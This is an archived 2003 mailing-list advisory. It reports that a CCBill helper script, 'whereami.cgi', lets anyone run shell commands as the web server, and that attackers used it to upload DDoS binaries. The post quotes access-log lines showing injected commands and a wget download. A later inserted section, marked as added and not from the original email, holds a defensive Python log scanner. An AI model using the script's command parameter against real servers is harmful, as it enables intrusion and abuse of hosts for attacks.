Another overflow exploit for Apache? *RESOLVED*

From: Dayne Jordan <djordan(at)completeweb.net>
Date: Thu Jul 03 2003 - 12:46:39 EDT

Greetings again,

We found that this exploit was NOT a result of an Apache exploit.

After waiting for the culprits to attempt their mischief again, we were waiting and watched as they re-uploaded their rogue Ddos scripts to /tmp and executed thru Apache - not to our surprise, it appears CCBILL once again has some very exploitable 'helper' scripts they upload when installing their software.

On ALL the machines with the Ddos behavior we found, there was one common script on all of them ' whereami.cgi '. This script, when executed from the browser allows system commands to be entered and executed as the web server. We even used wget and lynx thru this command interface to upload various things into /tmp/. Our culprits were uploading old-school and common Ddos binaries, then executing them.. nothing root worthy, but nonetheless a pain in the arse.

Excerpt log entries from our test machines:

Machine getting it - how we uploaded a test binary:
216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST /ccbill/whereami.cgi?g=ls HTTP/1.1" 200 1033 "http://our.test.fileserver/ccbill/whereami.cgi?g=ls" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"

Machine serving it:
216.226.xxx.xxx - - [03/Jul/2003:11:59:59 -0400] "GET /rogue-test.tar HTTP/1.0" 200 286720 "-" "Wget/1.5.1"

Other things we did with it:
216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET /ccbill/whereami.cgi?g=mkdir%20/tmp/boo HTTP/1.1" 200 247 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; H010818; T312461)"

and then...

su-2.02# ls -la /tmp
drwxrwxrwt   6 root    wheel    3072 Jul  3 12:42 .
drwxr-xr-x  19 root    wheel     512 Mar 17 17:01 ..
drwxr-xr-x   2 nobody  wheel     512 Jul  3 12:44 boo
srwxrwxrwx   1 mysql   wheel       0 Jul  3 00:05 mysql.sock
[snipped]

And snippet from one of the affected machines running 'hell' a simple Ddos binary:
172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET /ccbill/whereami.cgi?g=v/hell HTTP/1.1" 200 265 "-" "Mozilla/4.0

Once you initiate the /whereami.cgi?g=ls command from the browser, you then get an input box and an enter button on your browser - execute any command you like, including wget, lynx, tar, sh, etc etc.

This script is most likely used by CCBILL techs as part of their default installation so that they can administer/setup their necessary scripts/software. Unfortunately, there is a huge hole in this script. We have a customer who very recently had CCBILL set up their services on his website and the very same 'whereami.cgi' exists even on this current date build.

So in short, those of you who use CCBILL make sure to remove or render useless the 'whereami.cgi' script in your /ccbill directory(ies). Across all our machines where we know CCBILL exists we've found this script on every one so far - and removed it ;)

D.



>
> Greetings,
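Added here as an illustration for defenders, not part of the original post: a small access-log scanner that flags requests to a whereami.cgi-style command shell and recovers the URL-decoded command from the `g` parameter, so the entries above can be found across a server farm without reading logs by hand. The sample lines are constructed from the ones quoted in the post (IPs masked as in the original), with one benign request mixed in.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines modelled on those in the post.
# The third line is a benign request and must not be reported.
SAMPLE_LOG = """\
216.226.xxx.xxx - - [03/Jul/2003:12:00:00 -0400] "POST /ccbill/whereami.cgi?g=ls HTTP/1.1" 200 1033 "-" "Mozilla/4.0"
216.226.xxx.xxx - - [03/Jul/2003:12:44:41 -0400] "GET /ccbill/whereami.cgi?g=mkdir%20/tmp/boo HTTP/1.1" 200 247 "-" "Mozilla/4.0"
216.226.xxx.xxx - - [03/Jul/2003:12:45:10 -0400] "GET /ccbill/index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
172.157.111.201 - - [01/Jul/2003:16:58:20 -0400] "GET /ccbill/whereami.cgi?g=v/hell HTTP/1.1" 200 265 "-" "Mozilla/4.0"
"""

# Common Log Format prefix: client IP, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def whereami_hits(log_text):
    """Return one dict per request to whereami.cgi that carried a 'g' parameter.

    parse_qs() URL-decodes the value, so the command the client actually
    asked the web server to run (e.g. 'mkdir /tmp/boo') is what gets reported.
    """
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable access-log line
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/whereami.cgi"):
            continue  # some other resource under /ccbill
        cmds = parse_qs(parts.query).get("g")
        if not cmds:
            continue  # script requested without a command
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": int(m.group("status")),
            "command": cmds[0],
        })
    return hits


if __name__ == "__main__":
    for hit in whereami_hits(SAMPLE_LOG):
        print(f'{hit["time"]} {hit["ip"]} ran: {hit["command"]}')
```

A 200 status on such a request means the script answered, which on an unpatched host is the signal to pull the box for cleanup and remove the script as the post advises.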

Received on Thu Jul 3 14:58:40 2003

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:10 EDT
